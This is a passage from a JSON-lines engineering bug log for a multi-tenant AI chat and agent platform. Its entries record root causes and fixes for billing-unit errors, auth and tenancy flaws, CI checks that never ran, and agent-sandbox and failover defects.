endpoints absent from upstream, both by design). Verified the regenerated bytes reach the served artefact by building hive-web-console-prod:ci and hashing the GET /api/openapi.yaml response body. Follow-up recommended: a CI codegen-drift step mirroring the existing permissions.generated.ts one.", "tags": ["contract", "openapi", "codegen-drift", "docs", "ci-gap"]} +{"id": "BUG-1702", "date": "2026-09-02", "title": "The #1682 invoice repair understated three pre-rescale July 2026 rows by exactly 10,000x and then froze them outside its own predicate", "error_message": "Invoice 49a53ec7 stored 84,276 credits and billed 1 paisa where credit_ledger_entries holds 842,760,000 credits for the same account and period, about 103.77 BDT. Invoices 9a056d8a and a1942bcb were understated by the same factor and billed 0 paisa.", "root_cause": "invoices.Service.repairOne read every row matching usd_bdt_rate IS NULL as a credit count at TODAY's peg. Three July 2026 rows predate the credit unit rescale (D-046, migration 20260823_40), when one USD was 100,000 credits rather than 1,000,000,000, so the factor is 1e9/1e5 = 10,000. The rescale migration scaled credit_ledger_entries and every other credit column it could see, but not the invoice figure, which was sitting in a column named total_bdt_subunits and correctly read as taka. The repair's own reconciliation compared the line item sum against the stored total, and on a pre-rescale row both are in the same old scale, so they agreed. The write is one way by design (setting usd_bdt_rate removes a row from the predicate), so the three rows were then frozen and a re-run skipped them.", "fix": "Both repair passes now reconcile against credit_ledger_entries for the row's own account and period and refuse any write whose credit figure the ledger does not support within 50 basis points (withinLedgerTolerance). repairOne no longer assumes a peg: creditScaleFactor asks the ledger which unit the stored integer is in. A second pass, RepairPreRescaleInvoices, selects rows by period_end against public.credit_unit_rescale.applied_at read from the database (never parsed from the migration filename), scales the frozen rows and their line items by the rescale factor, recomputes the taka at the rate already on the row, regenerates the PDF and writes under an UPDATE guarded on the quantity it read. Idempotence comes from convergence: a corrected row agrees with its ledger, so the next pass writes nothing.", "tags": ["money", "invoices", "billing", "credits", "credit-unit-rescale", "d-046", "idempotency", "data-repair", "issue-1702", "issue-1682"]} +{"id": "bug-2026-09-02-web-tools-unbilled", "date": "2026-09-02", "title": "web_search and web_fetch served provider spend with no hold, no charge and no usage row", "error_message": "none: the failure was silent by construction. apps/edge-api/internal/webtools/handler.go ran admitCall, the budget check, the backend call and writeEnvelope, and the package imported neither accounting nor sessionbilling, so a tool call produced no reservation and no usage_events row at all.", "root_cause": "The web tools shipped as a capability slice with metering deferred. reduce.go:76-88 recorded the choice openly (the fetch embedding is not metered, a deliberate decision for that slice) and nothing tracked the debt back to a settlement path, so the surface reached the point of being wired into main.go with the money path still absent. Compounding it, the price could not be read even if the handler had wanted it: a per call price had no unit on model_aliases, and the two aliases have no provider_routes row, so SelectRoute could not answer for them.", "fix": "Add price_unit 'calls' to the model_aliases CHECK and seed hive-web-search and hive-web-fetch as internal price carriers (100000 and 200000 credits per call at the D-046 peg). Add GET /internal/routing/alias-price so a caller with no route to select can still read a catalog price. Charge in the two tool handlers through sessionbilling's existing hold and settle lifecycle via a new ReserveCharge entry point, failing closed on any unpriceable call and releasing the hold on any failed one.", "tags": ["billing", "money-path", "web-tools", "fail-closed", "catalog-pricing", "edge-api", "control-plane", "issue-1695"]} +{"id": "bug-1360-agent-packs-never-read", "date": "2026-09-02", "title": "Agent packs were mounted into every sandbox and read by nothing", "error_message": "No AGENTS.md and none of the three knowledge-work skills ever appeared in a sandboxed agent's context; the Skill: prefix had nothing to route to", "root_cause": "Two breaks in series on the only launch arm that runs a real task. engine.Launch created the session working directory empty and left the pack at /opt/hive/pack (a read-only bind) and /opt/hive/packs (baked into the SIF), and the vendored OpenHands SDK reads neither: load_project_skills only ever reads the conversation's own working directory. Behind that, AgentContext.load_project_skills defaults to False and Hive sent agent_context only when a system-message suffix was configured, which no deployment sets, so even a correctly populated workspace would have gone unread. The three knowledge-work skills were also laid out as skills//AGENTS.md, which the loader turns into path rules that force disable_model_invocation and are never listed to the model.", "fix": "engine.Launch copies the pack into the session working directory before launch and fails closed when it is missing; the launch payload always carries agent_context with load_project_skills true; the three skills moved to .agents/skills//SKILL.md with frontmatter; the workspace listing filters the planted entries so the run panel still shows only task output.", "tags": ["agent-engine", "openhands", "sandbox", "prompt", "packs", "silent-failure"], "issue": 1360} +{"id": "free-pool-404-no-failover", "date": "2026-08-25", "title": "LiteLLM aborts a load-balanced group on one member's 404 instead of failing over, taking hive-free down", "error_message": "litellm.NotFoundError: NotFoundError: OpenAIException - Error code: 404No fallback model group found for original model_group=route-free-pool. Available Model Group Fallbacks=None -- surfaced to the customer as 'hive-free is not available.'", "root_cause": "litellm/router.py::should_retry_this_error re-raises immediately for NotFoundError and for any status where litellm._should_retry() is false; 404 is both. It is called from async_function_with_retries and async_function_with_fallbacks, so one pool member answering 404 (what a retired free model returns) killed the request while the group's other three members were healthy. litellm/types/router.py::RetryPolicy has no NotFoundErrorRetries field, so no config lifts it. The pool's existing unit test asserts the four rows share a litellm_model_name, which stayed true throughout, so the shape was right and the behaviour was wrong.", "fix": "Retry a LiteLLM router-exhaustion 404 in the shared dispatch seam (apps/edge-api/internal/inference/retry.go), matched on LiteLLM's message rather than on a bare 404 so a genuine model-not-found stays fast. Sound because LiteLLM cools the 404 deployment down on its first failure, so the next attempt picks a different member inside the 5s window. Added behavioural tests over dispatchWithRetry, a CI step that names a dead member via /health?model=, and a classifier branch for the signature.", "tags": ["litellm", "routing", "free-pool", "failover", "ci", "edge-api", "hive-free", "404"]} +{"id": "bug-2026-08-29-offbox-backup-pull-silence", "date": "2026-08-29", "title": "The off-box backup copy was six days stale and every signal anywhere was green", "error_message": "~/hive-backups/hive-demo/daily on the dev machine held exactly one day, 2026-08-23, while the box held seven and its status file showed sixteen consecutive OK ... files=4 lines; nothing reported the divergence", "root_cause": "The backup has two halves with opposite observability. scripts/backup-box.sh writes a status file, posts HiveBoxBackupFailed on error and posts HiveBoxBackupStale past 26 hours, so the on-box half is visible. scripts/pull-box-backups.sh is a manual command on a dev machine that wrote nothing anywhere, so its silence was indistinguishable from its success, and the observable half's health stood in as evidence for a property only the unobservable half guaranteed. Issue #1000 closed on 2026-08-23, the same day as the only pull.", "fix": "scripts/pull-box-backups.sh records the repository variable LAST_OFFBOX_BACKUP_PULL after, and only after, its checksums verify, and deploy-drift-watchdog.yml gains an offbox-backup-staleness job that fails and opens a deduped tracking issue once that marker passes 72 hours or is missing. Absent is stale, never unknown. The marker is a repository variable rather than a file on the box because nothing scheduled can read a file on the box and a check inside backup-box.sh would be inert on merge, since the box runs a hand-installed copy. Guarded by two tests in ci.yml's repo-policy-lints, one of which asserts the workflow still invokes the check.", "tags": ["backups", "observability", "ci", "demo-box", "issue-1491"]} +{"id": "owui-agent-shim-principal-gap", "date": "2026-08-17", "title": "OWUI shim-key requests to /v1/agent/tasks would have bound to the shim's own principal", "error_message": "none observed; latent", "root_cause": "requiresPerUserAuth in apps/edge-api/internal/auth/owui_unwrap.go returned true only for /v1/chat/completions, so a shim-key request to any other path fell through with the shim key still on Authorization and resolved as the shim account. Correct for the paths that existed then (embeddings and text-to-speech authenticate as the shim by design), wrong the moment a second per-user OWUI path appeared. A present-but-empty __metadata.upstream_auth had the same effect on the chat path itself, because it returned unwrapOK with an empty token and skipped the fail-closed arm.", "fix": "Extended requiresPerUserAuth to /v1/agent/tasks and its subtree, and made an empty upstream_auth report as a missing carrier so it takes the 401 arm and the warn log.", "tags": ["auth", "edge-api", "owui", "fail-closed", "tenancy"]} +{"id": "owui-agents-second-credential-prompt", "date": "2026-08-22", "error_message": "Clicking Agents in the chat sidebar presented its own email and password form captioned that the workspace is separate from chat, one click after a successful chat sign-in", "root_cause": "The Agents route embedded apps/agent-console in an iframe, and that application authenticates from a Supabase SSR cookie on the chat origin which chat's OAuth handshake never writes: the handshake mints an Open WebUI token only, and the user's Supabase token is reachable only server-side inside the chat container as the stored OAuth token", "fix": "Removed the iframe and rendered the task surface natively in the chat application, authenticating with the Open WebUI session the user already holds and brokering the Supabase token server-side through a FastAPI router added by owui-patches/hive_agent_proxy.py", "tags": ["owui", "auth", "agents", "iframe", "session", "demo-blocker", "issue-540"]} +{"id": "agent-tasks-stale-poll-overwrites-mutation", "date": "2026-08-22", "error_message": "A newly created agent task row disappeared, or a cancelled row reverted, and polling sometimes stopped entirely until the page was reloaded", "root_cause": "refresh assigned the fetched list over the whole tasks array, so a poll already in flight when a create or cancel completed landed afterwards and overwrote it, and schedulePoll then decided from that stale array and stopped when it held no in-flight task", "fix": "A mutation counter captured before the request goes out; refresh discards its own answer when a create or cancel landed while the request was open", "tags": ["svelte", "race", "polling", "agents"]} +{"id": "agenttasks-unit-tests-never-ran", "date": "2026-08-22", "error_message": "agentTasks.test.ts reported no failures because it was never loaded by any job", "root_cause": "The module imported $lib/constants, which reaches $app/environment, and scripts/test-owui-hive-frontend.sh runs plain vitest over copied files with no SvelteKit alias resolution, so the test file could not be loaded at all", "fix": "The API base is a parameter with a production default and the component passes the dev-aware value, so the module imports nothing and the tests load with no configuration", "tags": ["tests", "unfailable-check", "vitest", "sveltekit"]} +{"id": "owui-agent-proxy-smell-check-unfailable", "date": "2026-08-22", "error_message": "The identity smell loop in test_owui_agent_proxy.py reported a pass over a header read it was named after", "root_cause": "The tuple entry headers.get('Authorization') was expanded through accessor templates into request.query_params.get('headers.get('Authorization')'), a string no Python source can contain, so that iteration asserted nothing", "fix": "Separated the header smell into a direct substring test against the whole request.headers attribute, demonstrated failing on purpose", "tags": ["tests", "unfailable-check", "security"]} +{"id": "owui-unwrap-carrier-strip-unobservable", "date": "2026-08-23", "title": "Header-carrier strip asserted on a path no test could observe", "error_message": "TestOWUIUnwrap_HeaderCarrierPresentButBlank_StrippedAndRejected asserted only the Rejected half of its own name; the Stripped half was unobservable because next never runs on a 401", "root_cause": "The strip was applied to a clone of the request, so the only observation point was the downstream handler. Every rejection branch answers without calling next, so nothing on those branches could be checked, and an outer middleware still holding the pre-clone pointer would also have kept seeing a live per-user token. Moving Header.Del into the forwarding branches alone would have left the whole test file green.", "fix": "Strip the carrier from the inbound request in place instead of from a clone, making the invariant one fact rather than one fact per branch, and assert in both rejection tests that the header is gone from the request the middleware was handed. Safe because net/http never re-reads request headers after the handler returns and the header is ours alone.", "verification": "Green confirmed on unmodified code first. The production strip was then narrowed to fire only for a usable carrier, which is the exact regression described; all four blank sub-cases and the over-long case went red naming the new assertion, and the pass-through case went red too. Restoring the unconditional strip returned ./apps/edge-api/... to green.", "tags": ["auth", "edge-api", "owui-unwrap", "test-quality", "guard-cannot-fail", "security", "pr-951"]} +{"date": "2026-08-22", "area": "control-plane/signup", "error_message": "WARNING: phase-19 identity wiring skipped (missing env: OWUI_ADMIN_TOKEN, SUPABASE_WEBHOOK_SECRET); control-plane starts healthy with no reachable tenant-provisioning path", "root_cause": "Signup provisioning depended on a Supabase Database Webhook configured in a dashboard, and the repository-side replacement for it (the console tenant-provision route) was wired inside an env-gated block whose four variables included two optional ones. On a deployment with those unset the whole block was skipped, so provisioning had no reachable entry point at all, and the only signal was a startup log line while the process reported healthy.", "fix": "Wire provisioning unconditionally wherever a pool exists, gate only the Open WebUI group client and the legacy webhook route on their own variables, add signup.Reconciler as a database-driven sweep that needs no dashboard state, and report provisioning readiness on the health endpoint so an unwired path fails the container healthcheck instead of logging.", "tags": ["signup", "provisioning", "tenancy", "silent-failure", "healthcheck", "supabase", "D-023"]} +{"id": "skills-surface-outside-coverage-denominator", "date": "2026-08-29", "error_message": "The /skills surface shipped by PR #1388 was swept by no chat-coverage surface, so a frontend regression, a new proxy 404 rule, or user.permissions.workspace.skills reverting to false would each have emptied it with every gate still reporting green.", "root_cause": "surfaces.ts enumerates workspace tabs via a[href^=\"/workspace/\"] and lists every other surface by hand. A Hive route at /skills matches neither, so a newly shipped destination joins the sweep only if someone remembers to add it, and nothing fails when they do not.", "fix": "Added a swept `skills` surface to STATIC_SURFACES and a dataDriven presence bar of 1 in surface-floors.json, with unit cover asserting the surface is swept, floored at a presence bar, and that an empty sweep fails the gate. Also rewrote the instance-wide id collision message, which named a field the author never filled in and pointed at a skill they cannot read.", "tags": ["chat-coverage", "owui-fork", "skills", "silent-absence", "observability"]} +{"id": "bug-2026-08-12-cowork-cancel-slot-and-blocking-create", "date": "2026-08-12", "title": "Cancelling a Cowork task leaked its concurrency slot, and create reported failure for a task that succeeded", "error_message": "agent engine could not start the task (console: Blocked) after two cancels; CREATE status=500 elapsed=18.0s for a task that reached succeeded", "root_cause": "The agenttask.Engine interface carried only Launch, so Service.Cancel was a bare database transition and never stopped the sandbox; the launcher only releases a concurrency slot when the session ends, so a cancelled task held its slot for the sandbox's full life. Separately, CreateTask blocked inline on a launch bounded at five minutes while edge-api's control-plane client times out at fifteen seconds, so the browser was told 500 for work that kept running.", "fix": "Added Cancel to the Engine interface and called it from Service.Cancel after the row's atomic terminal guard, so the slot is released at cancel time. Made CreateTask return the persisted queued task and run the launch on a background goroutine, with the in-flight launch stopping its own session if it finds the task already terminal.", "tags": ["cowork", "agent-engine", "quota", "concurrency", "timeout", "control-plane", "issue-886", "issue-881"]} +{"date": "2026-08-16", "error_message": "Enter key does not send in the demo chat composer", "root_cause": "chat-coverage's live interaction-coverage sweep (persistencePass) flips every stateful Settings control, including ui.ctrlEnterToSend, on the shared demo account to prove persistence, then reloads to verify; the restore step ran after that reload with no guard, so a reload failure (demo box briefly unreachable, issue #815) threw past restoration and left the account's Enter Key Behavior toggled on with no error surfaced", "fix": "wrap the reload-and-verify step in persistencePass/persistOne (apps/web-console/e2e/chat-coverage/persistence.ts) in try/catch and run restoration unconditionally afterward; added a scheduled detector workflow (demo-chat-settings-check.yml) as a backstop and a regression test in break-proof.spec.ts", "tags": ["owui", "e2e", "chat-coverage", "demo-account", "regression"]} +{"date": "2026-08-11", "title": "A live coverage gate skipped most of its controls on a blocker that was never true", "error_message": "8/22 proven, 14 skipped with reason: Supabase admin user-listing 500s block credential rotation for the shared demo account", "root_cause": "The suite assumed the only way to authenticate was rotating a shared account's password through POST /auth/v1/admin/users, so when the admin listing endpoint returned 500s it concluded authentication was impossible and froze fourteen controls into a permanent skip. The sanctioned admin one-time-token flow in tests/e2e/support/live-auth.mjs needs no password, touches no credential, and never calls the failing endpoint. The false reason was then committed into a static coverage file that nothing regenerated, so it outlived the outage it described.", "fix": "Authenticate through live-auth.ts, which mints a session with generate_link plus verify. Delete the committed coverage snapshot, gitignore the generated one, and give the spec a Playwright project a workflow selects by name so the number comes from a run. Only the password submit path remains credential-gated, because it is the one control a minted session cannot prove.", "tags": ["e2e", "playwright", "auth", "coverage", "live-testing", "agent-workspace"]} +{"id": "bug-2026-09-02-owui-shim-key-revocable-by-seeder", "date": "2026-09-02", "title": "a scheduled seeder run could revoke the shim key a long-lived deployment carries, taking document RAG and voice down with no signal", "error_message": "none on the operator side, which is the defect: Open WebUI's document RAG embeddings, text-to-speech and speech-to-text answer a generic invalid-key error that names no cause, while sign-in, the model picker and chat completions stay healthy because they carry the signed-in user's own token.", "root_cause": "Two gaps left open after PR #558. First, the account boundary that keeps the nightly OWUI rotation off a deployment's key was documented in scripts/seed-owui-e2e-user.py's docstring and enforced nowhere: nothing refused a run pointed at CI's rotated account while a deployment carried a key on it, nothing refused a run that revoked keys on a deployment account while updating no consumer, and the stale-key cleanup deleted any key on the account regardless of who minted it or who carries it. Second, the health probe added for the same issue wrote its verdict only to the edge-api container log, and nothing reads a container log on a schedule, so a mid-life revocation stayed invisible until a customer hit it.", "fix": "Add assert_account_scope, called first in main() before any request, refusing the reserved CI account with a long-lived consumer configured and any other account with none, exit 2. Filter the stale-key DELETE to the script's own key nickname so a key minted by another route is never revoked. Export hive_owui_shim_key_usable from watchOWUIShimKey (registered only when a shim key is configured, and not written on a transient probe failure so it holds its last real verdict) and add the OWUIShimKeyUnusable rule to deploy/prometheus/alerts.yml, which routes through the already-delivering Alertmanager hive-ops receiver to the ops mailbox in about ten minutes.", "tags": ["credential-lifecycle", "open-webui", "shim-key", "observability", "alerting", "silent-failure", "edge-api", "seeder", "issue-560"]} +{"id": "bug-1622-cowork-steps-never-streamed", "date": "2026-09-02", "title": "A Cowork run's steps were recorded after the reader had already stopped reading", "error_message": "A multi-step agent run showed only 'Queued. Waiting for a sandbox.' for its whole life and then a bare summary with no tool-call lines and no step chain", "root_cause": "Three breaks in series between the sandbox and the transcript. (1) Poller.pollTask wrote a task's terminal status with no event flush, while the run's tail events were pulled by EventSyncer.finishVanished on an unrelated loop strictly after the row left ListActive; the transcript's follower stops the moment it reads a terminal status, so a run shorter than the sync interval lost that race every time and its steps were stored for nobody. (2) The event syncer shared the status poller's 15s interval, so even on a long run a tool call surfaced up to 15s after the agent took it. (3) StatusHistory.svelte renders the full chain only behind an expand prop defaulting to false, and ResponseMessage never passed it, so the steps that did arrive rendered as one line replacing itself.", "fix": "PollerConfig.FlushEvents, wired to EventSyncer.FlushTask, is called immediately before every terminal Transition and reads the session's event log from the beginning. The syncer takes its own HIVE_AGENT_TASK_EVENT_INTERVAL, default 2s, made affordable by tracking how far into each task's event log it has already appended and which workspace file entries it has already written. ResponseMessage passes expand for a turn carrying a hive_agent_task_id, and StatusHistory stops repeating the newest entry above the older steps.", "tags": ["agent-engine", "cowork", "streaming", "race", "control-plane", "open-webui", "silent-failure"], "issue": 1622} +{"id": "2026-08-17-chat-startup-serial-chain", "date": "2026-08-17", "area": "chat-frontend", "error_message": "Chat surface takes about 2.8 seconds warm and 3.2 seconds cold from navigation to a usable composer on the deployed box", "root_cause": "Startup issued five API requests strictly one after another (config, session, a byte-identical second config, user settings, model list) and the app layout gates the composer on the last of them. A round trip to the deployment costs about 220 ms, so chain depth alone was worth roughly 1.1 seconds. The bundle was never the cause: 155 chunks resolve inside 434 ms warm and a cold load costs only about 370 ms more end to end.", "fix": "Start the session fetch alongside the config fetch, delete the duplicate GET /api/config, and start the model list at the top of startup for the app layout to collect. Also declared the real cache lifetime for content-hashed assets under /_app/immutable, which Cloudflare was capping at its four-hour default because the backend sends no Cache-Control.", "tags": ["performance", "open-webui", "first-paint", "waterfall", "caddy", "cache-control"], "verification": "Six live loads per arm through an identical bundle-substitution harness against the deployed backend: composer visible at a median of 3115 ms before and 2091 ms after; serial round trips before the composer down from five to two. docs/proof/chat-first-paint-2026-08-17."} +{"id": "owui-config-race-after-parallel-startup", "date": "2026-08-22", "error_message": "With a missing or stale token cookie and a valid localStorage token, the chat application kept the anonymous /api/config reply for the page lifetime, dropping authenticated feature flags and permissions", "root_cause": "Parallelising the config fetch with the session fetch removed the ordering that made the second config call authenticated: GET /api/v1/auths/ is what sets the token cookie, and getBackendConfig sends no Authorization header, so the first config call can be answered for nobody", "fix": "The second config call is conditional on a tested predicate that detects the authenticated response shape, instead of being removed outright", "tags": ["owui", "auth", "startup", "race", "performance"]} +{"id": "model-prefetch-unit-tests-never-ran", "date": "2026-08-22", "error_message": "model-prefetch.test.ts reported no failures because no job ever loaded it", "root_cause": "The module sat in lib/utils and imported $lib/apis, which the dependency-free vitest runner covering this front end cannot resolve, and package.json's test:frontend script is referenced only by an unused upstream workflow", "fix": "The module takes its one dependency as a parameter and moved to lib/hive, where the runner loads it with no configuration", "tags": ["tests", "unfailable-check", "vitest", "sveltekit"]} +{"id": "byok-enc-key-wrong-service", "date": "2026-08-25", "title": "BYOK encryption key was wired to edge-api, so control-plane never got it and the feature was inert on every profile", "error_message": "byok locked mode: HIVE_BYOK_ENC_KEY unset; register answers 503 byok_not_configured (on a deployment where the operator had set it)", "root_cause": "HIVE_BYOK_ENC_KEY was added to the edge-api environment block in deploy/docker/docker-compose.yml. edge-api never reads it. control-plane, which owns every read and write of tenant_provider_keys, has an explicit environment allowlist and was not given the variable, so it booted into locked mode on local, cloud and enterprise no matter what was in .env. Giving it to edge-api was also an exposure, since that service holds a database connection and so would have held both the ciphertext and the key.", "fix": "Moved the variable to the control-plane environment and removed it from edge-api. Verified with docker compose config across local, cloud, chat, agent and enterprise that exactly one service resolves it and it is never edge-api.", "tags": ["byok", "compose", "deployment", "secrets", "control-plane", "inert-feature"]} +{"id": "byok-integration-suite-never-ran", "date": "2026-08-25", "title": "BYOK repository integration suite was invisible to the db-test-wiring lint and absent from the CI package list", "error_message": "no error; the suite reported green by skipping everywhere it was invoked", "root_cause": "repository_test.go read its DSN as os.Getenv(repoTestDSNEnv) through a const. tools/lint-go-db-test-wiring.mjs matches os.Getenv(\"_TEST_DB_URL\") textually, so the const hid the file from the guard, and ./internal/byok/... was correspondingly missing from the integration package list in ci.yml. It skipped in the -short step and was never invoked by the step that exports HIVE_TEST_DB_URL, so the tenant-isolation proof had never executed. Same never-runs trap as issues #701, #708 and #797.", "fix": "Restored the bare os.Getenv(\"HIVE_TEST_DB_URL\") literal and added ./internal/byok/... to the integration list in ci.yml. Verified the lint now counts the pair and that both integration tests pass against a throwaway pgvector/pgvector:pg17 with the CI bootstrap and full migration chain applied.", "tags": ["ci", "testing", "camouflage", "lint", "byok", "never-runs"]} +{"id": "byok-repo-test-fk-and-inverted-assert", "date": "2026-08-25", "title": "BYOK repository integration tests could not have passed: FK violation on created_by_user_id plus an inverted assertion", "error_message": "insert or update on table \"tenant_provider_keys\" violates foreign key constraint \"tenant_provider_keys_created_by_user_id_fkey\"", "root_cause": "seedAccount inserted an auth.users row but discarded its id, and all three test keys passed a fresh random UUID as Key.CreatedBy. tenant_provider_keys.created_by_user_id is NOT NULL REFERENCES auth.users(id), so every Create failed the foreign key. Separately, the duplicate base_url case asserted `if dupURL.ID == uuid.Nil { t.Fatal(\"conflict path must not return a row\") }`, which fires exactly when the conflict path behaves correctly. Both were invisible because the suite never ran (see byok-integration-suite-never-ran).", "fix": "seedAccount now returns (accountID, userID) and every test key uses the returned user id. Inverted the duplicate assertion to !=. Both tests verified passing against real Postgres, and the FK confirmed live by probing it directly.", "tags": ["testing", "postgres", "foreign-key", "byok", "assertion-inverted"]} +{"date": "2026-08-16", "tags": ["agenttask", "poller", "backoff", "cross-tenant", "agent-engine"], "error_message": "agenttask.Poller polled every tenant's active tasks at ~300s (maxPollerBackoff) instead of the configured 15s for hours, and a per-task failure budget's first two drafts left a slot-leak and an interval-coupling defect of their own", "root_cause": "RunOnce returned a non-nil error, feeding loop's exponential backoff, whenever a task-level problem occurred; a first fix attempt narrowed this to errCount == len(tasks), which still collapses to a single task's own error whenever exactly one task is active, the ordinary shape under this deployment's quota. ErrEngineSessionGone alone did not cover every dead-session shape (a 502 from a session the launcher still accounts for, not a 404). A second fix attempt (a per-task failure budget) then failed a budget-exhausted row without ever stopping its still-live engine session, reproducing issue #886's leaked-slot symptom, and expressed the budget as a fixed pass count that would have silently shortened under a tuned poll interval.", "fix": "RunOnce's returned error now means only that ListActive itself failed. Every task-level problem is scoped to a per-task consecutive-failure budget expressed as a duration (maxTaskFailureDuration, 5 minutes) and converted to a pass count via the poller's own configured interval: ErrEngineSessionGone still fails a task immediately (nothing to stop), any other error is retried until the budget is exhausted, best-effort stops the session via a type-asserted Cancel, then fails the task directly regardless of error shape, without ever feeding the shared backoff. The per-task failure map is mutex-guarded since RunOnce is exported."} +{"id": "bug-2026-08-23-owui-instance-admin-from-tenant-owner", "date": "2026-08-23", "title": "Open WebUI instance admin was derived from a tenant role, granting a customer admin over every other tenant's chat", "error_message": "A tenant OWNER signing into the shared Open WebUI instance resolved Open WebUI role=admin, could enumerate every tenant's users, read another user's chat titles and read another tenant's uploaded file", "root_cause": "Three independent promotion paths on one shared instance: deploy/docker/owui-patches/tenant_role_from_db.py mapped a single ACTIVE tenant_users row with role OWNER onto Open WebUI admin; stock Open WebUI promoted the only user of the instance to admin both at login time (above the Hive splice point, so the Hive lookup never ran for that login) and after inserting a user; and public.custom_access_token_hook emitted owui_role ADMIN for OWNER while OAUTH_ADMIN_ROLES named ADMIN. Instance admin was a side effect of tenancy rather than a deliberate platform grant. A fourth, fail-open path was found on this branch's own adversarial pass: a failed lookup kept whatever fallback role was already computed, which upstream sets from the stored role, so an existing admin kept admin whenever the database was unreachable", "fix": "Resolve instance admin only from public.accounts.is_platform_admin plus an ACTIVE owner row in public.account_memberships, the same predicate apps/control-plane/internal/platform/role_pgx.go uses; clamp an admin fallback to user when the lookup fails; delete both upstream single-user bootstraps through assertion-guarded exact-literal rewrites in apply_tenant_role_patch.py; add supabase/migrations/20260823_03_owui_role_never_admin.sql so owui_role emits MEMBER for OWNER and ADMIN. Regression guards: TestCustomAccessTokenHook_OwuiRoleNeverGrantsInstanceAdmin (database backed) and scripts/test_owui_tenant_role.py in make test-scripts", "tags": ["auth", "security", "open-webui", "multi-tenant", "privilege-escalation", "issue-748"]} +{"id": "1450-min-purchase-below-hold", "date": "2026-08-29", "title": "minimum purchase was one tenth of the hold it had to clear, so buying the minimum was refused on the first message", "error_message": "Your available credit does not cover this request", "root_cause": "MinPurchaseCredits (apps/control-plane/internal/payments/types.go) and DefaultHoldText (apps/edge-api/internal/inference/pricing.go) encode one relationship as two constants in separate Go modules with no dependency edge, so neither the compiler nor any test compared them. The minimum was 10,000,000 credits and the chat hold was 100,000,000. Two of the five PredefinedTiers were below one hold and a third equalled exactly one. Compounding it, ValidatePurchaseAmount never enforced any minimum: MinPurchaseCredits was advertised as min_credits and clamped only by the console, so a direct InitiateCheckout caller bypassed it entirely. A first fix that raised the number without enforcing its justifications left four green mutations, including a multiple of 2 that restored the defect at a 0.20 USD floor and a hold expressed as an arithmetic expression that the source parsing guard half-read.", "fix": "Derive MinPurchaseCredits from ChatHoldCredits (a named mirror of the hold) times MinPurchaseHoldMultiple = 10, so 1.00 USD; derive PredefinedTiers as multiples of that floor; enforce the floor in ValidatePurchaseAmount and map it through an ErrBelowMinimumPurchase sentinel rather than by substring. Guard re-drift with purchase_floor_test.go, which parses DefaultHoldText, VariablePriceMaxCompletionTokens, VariablePriceCompletionCeilingUSD, MarginNumerator and MarginDenominator out of edge-api's source on every run and asserts the mirror is exact, the multiple is at least 2, the floor covers the flat hold, Stripe's 0.50 USD rail minimum and two of the smallest real variable-price hold, and sits under every per-rail ceiling. The regexp is anchored at both ends so a computed declaration fails loudly instead of being half-read.", "tags": ["money", "billing", "payments", "cross-module-drift", "credit-unit", "issue-1450"], "pr": 1515} +{"id": "BUG-2026-08-11-platform-admin-status", "date": "2026-08-11", "title": "IsPlatformAdmin ignored membership status, so an invited owner could mint credit", "error_message": "IsPlatformAdmin for role=owner status=invited = true, want false", "root_cause": "public.account_memberships carries status active or invited, but IsPlatformAdmin and GetMembershipRole selected on role alone. An invited row is an offered seat, so an unaccepted owner invitation on an is_platform_admin account passed RequirePlatformAdmin, which gates POST /v1/admin/credit-grants and the provider administration surface. The invoices AccessChecker, EnsureViewerContext default workspace pick, and the web console switch route and switcher read the same rows with the same omission. Latent rather than exploitable: no shipped code path writes an invited membership row, so the escalation needed a writer that does not exist today.", "fix": "Added AND status = active to both queries, required an active row in the invoices AccessChecker, the account switch route and the workspace switcher, and restricted EnsureViewerContext to active memberships while still reporting invited ones on the wire. ActorFor blanks the role for a non-active membership as defence in depth. AcceptInvitation activates a pre-written invited row through a new idempotent ActivateMembership write instead of refusing it, writes the membership before consuming the invitation, consumes it under accepted_at IS NULL, and reports a failed activation as its own sentinel so the invitee is never told a good link is invalid. The accounts handler stopped echoing raw errors into 500 bodies. Added live database guards in internal/platform and listed that package in the CI live database step, which had never run it.", "tags": ["security", "authorization", "control-plane", "rbac", "sql", "ci-blind-spot", "race-condition"], "issue": 877} +{"error_message": "Open WebUI admin sessions could read every other tenant's Knowledge collections and any user's chats", "root_cause": "BYPASS_ADMIN_ACCESS_CONTROL and ENABLE_ADMIN_CHAT_ACCESS default to true upstream and were never set in deploy/docker/docker-compose.yml, and every sole tenant OWNER on this deployment is promoted to Open WebUI admin", "fix": "set both to \"false\" on the open-webui service in deploy/docker/docker-compose.yml, covering local/enterprise/chat profiles; no DB reconciliation needed since both are plain os.getenv reads at import time", "tags": ["security", "open-webui", "rbac", "cross-tenant"]} +{"id": "owui-boot-guard-fatal-crash-loop", "date": "2026-08-31", "component": "deploy/docker/owui-patches", "error_message": "hive-open-webui-1 crash looping (RestartCount above 20), chat returning 502; boot aborted by \"issue #1575 guard: this deployment sets 2 environment variable(s) that back an Open WebUI persisted config key and this module does not reconcile: TIKTOKEN_ENCODING_NAME; WHISPER_MODEL\". After the revert, chat web search failed with \"An error occurred while searching the web\" and the container logged \"No SEARXNG_QUERY_URL found in environment variables\".", "root_cause": "PR #1582 added guard_unreconciled_env_vars with raising as its only mode and called it from inside Open WebUI's FastAPI startup splice. The finding was correct, since both variables are baked into the pinned image's own Dockerfile and so sit in os.environ on every container and never appeared in this repo's compose-derived fixtures, but a boot-time raise turned a config-hygiene finding into a full chat outage. The same splice carried eight more raises of that shape one line later, inside overrides, none noticed at the time. PR #1587 reverted #1582 wholesale to restore service, which also removed the web.search.searxng_query_url reconcile entry, so live web search stayed broken while the container environment was correct.", "fix": "Re-landed #1582 with a fatal flag threaded through the whole boot path. guard_unreconciled_env_vars and a new _refuse(message, fatal) helper raise at the fatal=True default, which is what CI uses, and log at ERROR plus skip the one offending key at fatal=False, which the boot splice now passes. All eight raises in derived_upload_cap, openai_connection_override and overrides route through _refuse. The guard call is additionally wrapped in try/except, because inspect.getsource is evaluated as an argument and raises OSError or TypeError before fatal=False can be consulted. TIKTOKEN_ENCODING_NAME and WHISPER_MODEL are reconciled in RAG_CONFIG_ENV rather than allowlisted, since both are read live via Config.get_many. Four AST-based and behavioural tests now guard the boot call site itself, which had no test at all.", "lesson": "A guard called from inside application startup must not have raising as its only mode, and making one call non-fatal proves nothing about the call sites around it. Separately: a branch whose merge base predates a revert of the code it re-lands is CONFLICTING, and a CONFLICTING pull request gets no merge ref, so any green run on it tested a tree that will never deploy.", "tags": ["open-webui", "boot-guard", "crash-loop", "config-reconcile", "web-search", "incident", "issue-1575", "pr-1582", "pr-1587", 